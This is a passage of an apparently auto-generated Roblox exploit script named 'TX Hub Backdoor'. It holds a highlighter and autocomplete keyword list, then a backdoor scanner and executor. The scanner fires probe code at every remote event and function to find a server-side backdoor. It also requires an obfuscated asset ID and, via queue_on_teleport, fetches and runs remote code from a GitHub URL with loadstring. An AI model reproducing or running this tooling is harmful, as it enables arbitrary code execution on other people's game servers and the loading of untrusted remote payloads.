Blue = "function", DarkGray = "function", Gray = "function", Green = "function", new = "function", New = "function", palette = "function", Random = "function", random = "function", Red = "function", White = "function", Yellow = "function", },  CatalogSearchParams = { new = "function", },  CFrame = { Angles = "function", fromAxisAngle = "function", fromEulerAngles = "function", fromEulerAnglesXYZ = "function", fromEulerAnglesYXZ = "function", fromMatrix = "function", fromOrientation = "function", lookAt = "function", new = "function",  identity = "CFrame", },  Color3 = { fromHex = "function", fromHSV = "function", fromRGB = "function", new = "function", toHSV = "function", },  ColorSequence = { new = "function", },  ColorSequenceKeypoint = { new = "function", },  DateTime = { fromIsoDate = "function", fromLocalTime = "function", fromUniversalTime = "function", fromUnixTimestamp = "function", fromUnixTimestampMillis = "function", now = "function", },  DockWidgetPluginGuiInfo = { new = "function", },  Enum = {},  Faces = { new = "function", },  FloatCurveKey = { new = "function", },  Font = { fromEnum = "function", fromId = "function", fromName = "function", new = "function", },  Instance = { new = "function", },  NumberRange = { new = "function", },  NumberSequence = { new = "function", },  NumberSequenceKeypoint = { new = "function", },  OverlapParams = { new = "function", },  PathWaypoint = { new = "function", },  PhysicalProperties = { new = "function", },  Random = { new = "function", },  Ray = { new = "function", },  RaycastParams = { new = "function", },  Rect = { new = "function", },  Region3 = { new = "function", },  Region3int16 = { new = "function", },  RotationCurveKey = { new = "function", },  task = { cancel = "function", defer = "function", delay = "function", desynchronize = "function", spawn = "function", synchronize = "function", wait = "function", },  TweenInfo = { new = "function", },  UDim = { new = "function", },  UDim2 = { fromOffset = "function", fromScale = "function", new = "function", },  Vector2 = { new = "function",  one = "Vector2", xAxis = "Vector2", yAxis = "Vector2", zero = "Vector2", },  Vector2int16 = { new = "function", },  Vector3 = { fromAxis = "function", FromAxis = "function", fromNormalId = "function", FromNormalId = "function", new = "function",  one = "Vector3", xAxis = "Vector3", yAxis = "Vector3", zAxis = "Vector3", zero = "Vector3", },  Vector3int16 = { new = "function", }, }, } local enumLibraryTable = language.libraries.Enum  for _, enum in ipairs(Enum:GetEnums()) do enumLibraryTable[tostring(enum)] = "Enum" end  return language end; }; local function C_b() local script = G2L["b"]; local script = script local Highlighter = require(script.Highlighter)  Highlighter.highlight({ textObject=script.Parent })  textbox=script.Parent textbox.InputChanged:Connect(function() if textbox.Text~='' then textbox.TextTransparency=1 return end textbox.TextTransparency=0 end) end; task.spawn(C_b); local function C_f() local script = G2L["f"]; local textBox = script.Parent local suggestions={"and", "break", "do", "else", "elseif", "end", "false", "for", "function", "if", "in", "local", "nil", "not", "or", "repeat", "return", "then", "true", "until", "while", "continue", "export", "type", "typeof", "self", "as", "any", "unknown", "never", "boolean", "number", "string", "thread", "vector", "buffer", "userdata", "variadic", "generic", "export","module", "game", "workspace", "script", "shared", "_G", "require", "print", "warn", "error", "assert","tostring", "tonumber", "pcall", "xpcall", "next", "pairs", "ipairs", "select", "getmetatable","setmetatable", "rawequal", "rawget", "rawset", "tick", "time", "delay", "spawn", "wait","gcinfo", "collectgarbage", "_VERSION", "os", "debug", "coroutine" , "task", "math", "table", "utf8", "bit32", "string", "pi", "huge", "nan", "inf", "Players", "ReplicatedStorage", "ServerStorage", "ReplicatedFirst", "StarterGui", "StarterPack", "StarterPlayer", "SoundService", "Lighting", "TweenService", "HttpService" , "RunService", "UserInputService", "ContextActionService", "Debris", "Teams", "Chat", "TextChatService", "VoiceService", "LogService", "MarketplaceService", "DataStoreService", "MessagingService", "TeleportService", "CollectionService", "BadgeService", "AssetService", "AnalyticsService", "Selection", "StudioService", "SocialService", "VRService", "PolicyService", "ProximityPromptService", "PathfindingService", "GroupService", "MaterialService", "LocalizationService", "ChangeHistoryService", "TestService", "InsertService", "ScriptContext","Instance", "Part", "MeshPart", "UnionOperation", "Model", "Folder", "LocalScript", "ModuleScript", "RemoteEvent", "RemoteFunction", "BindableEvent", "BindableFunction", "UnreliableRemoteEvent", "ScreenGui", "Frame", "TextLabel", "TextButton", "TextBox", "ImageLabel", "ImageButton", "ScrollingFrame", "UIListLayout", "UIGridLayout", "UICorner", "UIStroke", "UIPadding", "UIScale", "UIGradient", "UIAspectRatioConstraint", "UITextSizeConstraint", "BillboardGui", "SurfaceGui", "Attachment", "Beam", "Trail", "ParticleEmitter", "Sound", "Animation", "Animator", "Humanoid", "Tool", "Accessory", "Shirt", "Pants", "ClickDetector", "ProximityPrompt", "SpawnLocation", "Sky", "Atmosphere", "Clouds", "PointLight", "SpotLight", "SurfaceLight", "ObjectValue", "StringValue", "BoolValue", "IntValue", "NumberValue", "Color3Value", "CFrameValue", "Vector3Value", "RaycastParams", "OverlapParams", "RaycastResult","new", "GetService", "WaitForChild", "FindFirstChild", "FindFirstChildOfClass", "FindFirstChildWhichIsA", "GetChildren", "GetDescendants", "IsA", "Destroy", "Clone", "Connect", "Once", "Wait", "Fire", "FireServer", "FireClient", "FireAllClients", "Invoke", "InvokeServer", "InvokeClient", "ClearAllChildren", "GetAttribute", "SetAttribute", "GetAttributes", "PivotTo", "GetPivot", "Raycast", "Play", "Stop", "Pause", "Resume", "cancel", "defer", "fromAxisAngle","fromEulerAnglesXYZ", "fromMatrix", "fromRGB", "fromHSV", "fromScale", "fromOffset", "fromHex", "identity", "angles", "lookAt", "GetPartBoundsInBox", "GetPartBoundsInRadius", "GetPartsInPart", "SetNetworkOwner", "GetNetworkOwner", "FindPath", "GetWaypoints", "ComputeRawPathAsync", "Name", "Parent", "ClassName", "Position", "Size", "Anchored", "CanCollide", "CanTouch", "CanQuery", "Transparency", "Reflectance", "Color", "Material", "Value", "Text", "Visible", "Enabled", "Character", "Health", "MaxHealth", "WalkSpeed", "JumpPower", "JumpHeight", "UserId", "Team", "TeamColor", "CFrame", "Orientation", "Rotation", "Velocity",  "LocalPlayer", "Adornee", "AlwaysOnTop", "ZIndex", "LayoutOrder", "BackgroundColor3", "BackgroundTransparency", "Touched", "TouchEnded", "Changed", "AncestryChanged", "InputBegan", "InputEnded", "RenderStepped", "Stepped", "Heartbeat", "PlayerAdded", "PlayerRemoving", "CharacterAdded", "CharacterRemoving", "Triggered", "Activated", "Equipped", "Unequipped", "MouseButton1Click", "MouseButton2Click", "MouseButton1Down", "MouseButton1Up","abs", "acos", "asin", "atan", "atan2", "ceil", "clamp", "cos", "cosh", "deg", "exp", "floor", "fmod", "frexp", "ldexp", "log", "log10", "max", "min", "modf", "noise", "pow", "rad", "random", "randomseed", "round", "sign", "sin", "sinh", "sqrt", "tan", "tanh", "byte", "char", "dump", "format", "gmatch", "gsub", "len", "lower", "match", "packsize", "rep", "reverse", "sub", "upper", "split", "insert", "remove", "find", "sort", "concat", "pack", "unpack", "clear", "move", "create", "freeze", "isfrozen", "readu8", "writeu8", "readi8", "writei8", "readf32", "writef32", "band", "bor", "bxor", "lshift", "rshift", "traceback", "profilebegin", "profileend", "yield", "resume", "running", "status", "wrap", "close", "isyieldable","Enum", "KeyCode", "UserInputType", "HumanoidStateType", "EasingStyle", "EasingDirection","PartType", "SurfaceType", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "Zero", "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine", "Space", "Return", "Backspace", "Tab", "LeftShift", "LeftControl", "Escape", "MouseButton1", "MouseButton2", "MouseButton3", "FallingDown", "Ragdoll", "Jumping", "Swimming", "Freefall", "Landed", "Flying", "Seated", "Dead", "Running", "Linear", "Sine", "Back", "Quad", "Quart", "Quint", "Bounce", "Elastic", "Exponential", "Circular", "Cubic", "Constant", "In", "Out", "InOut", "Ball", "Block", "Cylinder", "Wedge", "Smooth", "Glue", "Weld", "Studs", "Inlet", "Outlet", "Universal", "Hinge", "Top", "Bottom", "Left", "Right", "Front", "Action", "Movement", "Idle", "Core", "Roblox", "Legacy", "Bold","Italic", "Light", "Regular","Vector3", "Vector2", "Color3", "UDim2", "UDim", "BrickColor","Region3", "NumberRange","NumberSequence", "ColorSequence", "Rect", "DateTime", "Font", "TweenInfo", "PathWaypoint","PhysicalProperties", "OverlapParams", "RaycastParams","Hint", "Message", "HopperBin", "Explosion", "ForceField", "Fire", "Smoke", "Sparkles", "Sky", "Atmosphere", "Clouds", "SunRaysEffect", "BloomEffect", "BlurEffect",  "ColorCorrectionEffect", "DepthOfFieldEffect", "Highlight", "Decal", "Texture",  "HingeConstraint", "BallSocketConstraint", "SpringConstraint", "RopeConstraint",  "RodConstraint", "CylindricalConstraint", "PrismaticConstraint", "UniversalConstraint",  "NoCollisionConstraint", "WeldConstraint", "LinearVelocity", "AngularVelocity", "VectorForce", "LineForce", "Torque", "AlignPosition", "AlignOrientation",  "BodyVelocity", "BodyGyro", "BodyPosition", "BodyForce", "BodyThrust",  "BodyAngularVelocity", "RocketPropulsion", "Seat", "VehicleSeat", "SkateboardPlatform",  "CornerWedgePart", "TrussPart", "SelectionBox", "SelectionSphere", "SelectionPartLasso",  "SelectionPointLasso", "SurfaceSelection", "FloorWire", "BoxHandleAdornment",  "CylinderHandleAdornment", "SphereHandleAdornment", "ConeHandleAdornment",  "LineHandleAdornment", "ImageAdornment", "SurfaceAdornment", "AudioPlayer",  "AudioEmitter", "AudioListener", "AudioAnalyzer", "AudioEqualizer", "AudioCompressor",  "AudioDistortion", "AudioEcho", "AudioFader", "AudioChorus", "AudioFlanger",  "AudioPitchShifter", "AudioReverb", "SoundGroup", "ChorusSoundEffect", "EchoSoundEffect",  "FlangeSoundEffect", "PitchShiftSoundEffect", "ReverbSoundEffect", "TremoloSoundEffect",  "EqualizerSoundEffect", "DistortionSoundEffect", "CompressorSoundEffect",  "UIPageLayout", "UITableLayout", "UITextSizeConstraint", "UICenter", "UIFlexItem",  "CanvasGroup", "VideoFrame", "ViewportFrame", "BrickColorValue", "CFrameValue",  "Color3Value", "Vector3Value","RayValue","ObjectValue","Configuration",  "Team","Backpack","StarterGear","AnimationTrack","AnimationController","Bone"} local COLORS={BG=Color3.fromRGB(12, 12, 12), HOVER=Color3.fromRGB(11, 90, 175), TEXT=Color3.fromRGB(204, 204, 204), BORDER=Color3.fromRGB(12, 12, 12)} local menu=script.Parent.AutocompleteMenu.UIListLayout.Parent local layout=script.Parent.AutocompleteMenu.UIListLayout local function createRow(word, index) local row = Instance.new("TextButton") row.Size = UDim2.new(1, 0, 0, 22) row.BackgroundColor3 = COLORS.BORDER row.BorderSizePixel = 0 row.Transparency = 0 row.Text = "" row.AutoButtonColor = false row.LayoutOrder = index row.ZIndex = 101 row.Parent = menu local label = Instance.new("TextLabel") label.Size = UDim2.new(1, -28, 1, 0) label.Position = UDim2.new(0, 28, 0, 0) label.Text = word label.Font = Enum.Font.Code label.TextSize = 14 label.TextColor3 = COLORS.TEXT label.TextXAlignment = Enum.TextXAlignment.Left label.BackgroundTransparency = 1 label.ZIndex = 102 label.Parent = row row.MouseEnter:Connect(function() row.BackgroundColor3 = COLORS.HOVER label.TextColor3 = Color3.new(1, 1, 1) end) row.MouseLeave:Connect(function() row.BackgroundColor3 = COLORS.BG label.TextColor3 = COLORS.TEXT end) row.MouseButton1Down:Connect(function() local text = textBox.Text local lastWord = text:match("[%w_]+$") or "" local head = text:sub(1, #text - #lastWord) textBox.Text = head .. word menu.Visible = false task.wait() textBox:CaptureFocus() end) end textBox:GetPropertyChangedSignal("Text"):Connect(function() local lastWord = textBox.Text:match("[%w_]+$") or "" for _, v in pairs(menu:GetChildren()) do if v:IsA("TextButton") then v:Destroy() end end  if lastWord == "" or #lastWord < 1 or not textBox:IsFocused() then menu.Visible = true return end local found = 0 for _, word in pairs(suggestions) do if word:lower():sub(1, #lastWord) == lastWord:lower() then found += 1 createRow(word, found) if found >= 15 then break end end end menu.Visible = (found > 0) end) textBox.FocusLost:Connect(function() task.wait(0.15) if not textBox:IsFocused() then menu.Visible = true end end)  end; task.spawn(C_f); local function C_2e() local script = G2L["2e"]; local script = script queueteleport = (syn and syn.queue_on_teleport) or queue_on_teleport or (fluxus and fluxus.queue_on_teleport) if queueteleport then queueteleport("loadstring(game:HttpGet('https://raw.githubusercontent.com/TX-On-Top/TX-Hub-Backdoor/refs/heads/main/Backdoor-Scanner'))()") end  GUI=script.Parent.Frame  alphabet={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9','_','!','@','$','?'}  backdoor=nil HttpService=game:GetService("HttpService")  function debug(text, lvl) local func=print if lvl==1 then func=print end if lvl==2 then func=error end if lvl==3 then func=warn end func('TX Hub Backdoor:'..text) end  function runRemote(remote, data, data2) if remote:IsA('RemoteEvent') then remote:FireServer(data) elseif remote:IsA('RemoteFunction') then spawn(function() remote:InvokeServer(data) end) end end function makeVisible(folder, state) for i,v in folder:GetDescendants() do if v:IsA('Frame') then  v.Visible=state end end end  function notify(text) game:GetService('StarterGui'):SetCore( "SendNotification", { Title = "TX Hub Backdoor", Duration = 6, Text = text } ) end function notify2(text) game:GetService('StarterGui'):SetCore( "SendNotification", { Title = "TX Hub Backdoor", Duration = 6, Text = text } ) end   if _G.TX_Hub_Backdoor_Logs_Disabled then notify('Logs disabled :(') notify2('Logs disabled :(') end  makeVisible(GUI, false) GUI.Scanner.Visible=true GUI.Visible=true  function generateName(lenght)  local text=''  for i=1,lenght do text=text..alphabet[math.random(1,#alphabet)] end  return text  end  local code function findRemote()  local timee=os.clock()  local remotes={}  local protected_backdoor=game:GetService('ReplicatedStorage'):FindFirstChild('lh'..game.PlaceId/6666*1337*game.PlaceId) if protected_backdoor and protected_backdoor:IsA('RemoteFunction') then while true do code=generateName(math.random(12,30)) if not remotes[code] then break end end spawn(function() protected_backdoor:InvokeServer('Mysterious Hub Backdoor', "a=Instance.new('Model',workspace)a.Name='"..code.."'") end) remotes[code]=protected_backdoor end  for i,remote in game:GetDescendants() do  if not remote:IsA('RemoteEvent') then  if not remote:IsA('RemoteFunction') then continue end end if string.split(remote:GetFullName(), '.')[1]=='RobloxReplicatedStorage' then debug('Roblox Replicated Storage ('..remote.Name..')', 1) continue end  if remote.Parent==game:GetService("ReplicatedStorage") or remote.Parent.Parent==game:GetService("ReplicatedStorage") or remote.Parent.Parent.Parent==game:GetService("ReplicatedStorage") then  if remote:FindFirstChild('__FUNCTION') or remote.Name=='__FUNCTION' then debug('Adonis filter detected ('..remote.Name..')', 1) continue end  if remote.Parent.Parent.Name=='HDAdminClient' and remote.Parent.Name=='Signals' then debug('HD Admin ('..remote.Name..')', 1) continue end  if remote.Parent.Name=='DefaultChatSystemChatEvents' then debug('Chat event ('..remote.Name..')', 1) continue end  end  while true do code=generateName(math.random(12,30)) if not remotes[code] then break end end  runRemote(remote, "a=Instance.new('Model',workspace) a.Name='"..code.."'") remotes[code]=remote  debug('Sended Backdoor "'..remote:GetFullName()..'"', 1)  end  for i=1,100 do  for i,remote in remotes do local code=i  if workspace:FindFirstChild(code) then  notify('Backdoor found! Enjoy') notify2('Remote Name is "'..game.ReplicatedStorage:FindFirstChildWhichIsA("RemoteEvent").Name..'"')     backdoor=remote debug(remote:GetFullName(), 3) GUI.Scanner.Visible=false makeVisible(GUI.Executor, true) runRemote(remote, "require(171016405.1884*69)") runRemote(remote, "a=Instance.new('Hint')a.Text='TX Hub Backdoor'while true do a.Parent=workspace task.wait(15)a:Destroy()task.wait(30)end") return true end  end  wait()  end  return false  end  GUI.Executor.Execute.Button.MouseButton1Click:Connect(function() local a,b=string.gsub(GUI.Executor.ExecutorBox.TextBox.Text, '%%username%%', game:GetService('Players').LocalPlayer.Name) local protected_backdoor=game:GetService('ReplicatedStorage'):FindFirstChild('lh'..game.PlaceId/6666*1337*game.PlaceId) if protected_backdoor and protected_backdoor:IsA('RemoteFunction') then debug('Protected backdoor found', 3) spawn(function() local boolValue, variantValue=pcall(function() protected_backdoor:InvokeServer('TX', a) end) if variantValue~=nil then local splited=string.split(variantValue,':') notify(splited[#splited]) end end) else runRemote(backdoor ,a) end end)   GUI.Executor.Clear.Button.MouseButton1Click:Connect(function() GUI.Executor.ExecutorBox.TextBox.Text = '' end)  searching=false  GUI.Scanner.Button.MouseButton1Click:Connect(function() if not searching then searching=true debug('Scanning...', 3) GUI.Scanner.Button.Text='Scanning...' if not findRemote() then GUI.Scanner.Button.Text='No backdoor' searching=false end end end)  game:GetService('UserInputService').InputBegan:Connect(function(input, processed) if (input.KeyCode == Enum.KeyCode.LeftAlt and not processed) then if GUI.Visible then GUI.Visible=false else GUI.Visible=true end end end)  local script = script local UIS = game:GetService("UserInputService") function dragify(Frame) dragToggle = nil local dragSpeed = 0.33 dragInput = nil dragStart = nil local dragPos = nil function updateInput(input) local Delta = input.Position - dragStart local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y) game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.15), {Position = Position}):Play() end Frame.InputBegan:Connect(function(input) if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then dragToggle = true dragStart = input.Position startPos = Frame.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragToggle = false end end) end end) Frame.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) game:GetService("UserInputService").InputChanged:Connect(function(input) if input == dragInput and dragToggle then updateInput(input) end end) end  dragify(script.Parent.Frame)  local screenGui = script.Parent local rotationSpeed = 45 local timeElapsed = 0  local function getAllUIGradients() local gradients = {} for _, descendant in screenGui:GetDescendants() do if descendant:IsA("UIGradient") then table.insert(gradients, descendant) end end return gradients end  local function rotateAllGradients(deltaTime) local gradients = getAllUIGradients()  for _, gradient in gradients do  local currentRotation = gradient.Rotation local newRotation = (currentRotation + rotationSpeed * deltaTime) % 360 gradient.Rotation = newRotation end end  local RunService = game:GetService("RunService")  RunService.Heartbeat:Connect(function(deltaTime) timeElapsed = timeElapsed + deltaTime rotateAllGradients(deltaTime) end)  rotateAllGradients(0)  screenGui.DescendantAdded:Connect(function(descendant) if descendant:IsA("UIGradient") then rotateAllGradients(0) end end) end; task.spawn(C_2e);  return G2L["1"], require; 
